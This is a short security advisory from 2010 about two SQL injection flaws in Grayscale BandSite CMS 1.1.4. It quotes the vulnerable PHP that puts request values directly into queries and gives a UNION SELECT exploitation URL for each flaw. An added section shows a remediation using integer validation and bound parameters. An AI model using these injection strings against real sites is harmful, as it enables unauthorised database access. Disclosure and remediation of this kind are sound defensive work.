
24.06.2010, 16:12
Grayscale BandSite CMS Ver. 1.1.4
Site: http://sourceforge.net/projects/bandsitecms/
SQL injection(-):
Vulnerable file:
./includes/content/interview_content.php
PHP code:
$intid=$_REQUEST['intid'];
// define the query
// if the $memid variable is set, that means we're displaying a full bio and we should select the specific member entry
if(isset($intid)){
$query="
SELECT
*
FROM
interviews
WHERE
rec_id=$intid";
}
Exploitation:
./interviews.php?intid=-2+union+select+1,2,^,^,5,6,^,8,9,10
SQL injection(-):
Vulnerable file:
./includes/content/lyrics_content.php
PHP code:
$sid=$_REQUEST['sid'];
// if the $sid variable is set, it means we're only after one song, so retrieve just that one
if (isset($sid)){
// define the query to get this song
$query="
SELECT
*
FROM
lyrics
WHERE
rec_id=$sid LIMIT
1";
// get the result
$result=mysql_query($query);
Exploitation:
/lyrics.php?sid=1+union+select+1,2,^,4,5,6,^,8,9
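
Added example, not part of the original post and not BandSite CMS code: both snippets above place a request value directly after rec_id= in the SQL text, and this sketch shows the same lookup with the id validated as an integer and passed as a bound parameter. The helper names, the in-memory SQLite database standing in for the CMS's MySQL database, and the table contents are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: returns the record id as an int, or null when the
// parameter is missing or is anything other than a positive integer.
function parse_record_id(array $request, string $name): ?int
{
    if (!isset($request[$name]) || !is_string($request[$name])) {
        return null;
    }
    $id = filter_var($request[$name], FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: fetches one row with a bound parameter, so the value
// is never concatenated into the SQL text.
function fetch_by_id(PDO $db, string $table, int $id): ?array
{
    // The table name comes from a fixed allow-list, never from the request.
    if (!in_array($table, ['interviews', 'lyrics'], true)) {
        throw new InvalidArgumentException('unknown table');
    }
    $stmt = $db->prepare("SELECT * FROM $table WHERE rec_id = :id LIMIT 1");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE interviews (rec_id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO interviews VALUES (1, 'Sample interview')");

// Constructed request values: one legitimate id, one non-numeric value.
foreach (['1', '-2 union select 1,2'] as $raw) {
    $id = parse_record_id(['intid' => $raw], 'intid');
    if ($id === null) {
        // In the application this would be a 400/404 response.
        echo 'rejected: ', var_export($raw, true), "\n";
        continue;
    }
    var_dump(fetch_by_id($db, 'interviews', $id));
}
```

The integer check alone already stops the value from reaching the query; the bound parameter keeps the lookup safe even if the validation is later loosened or bypassed.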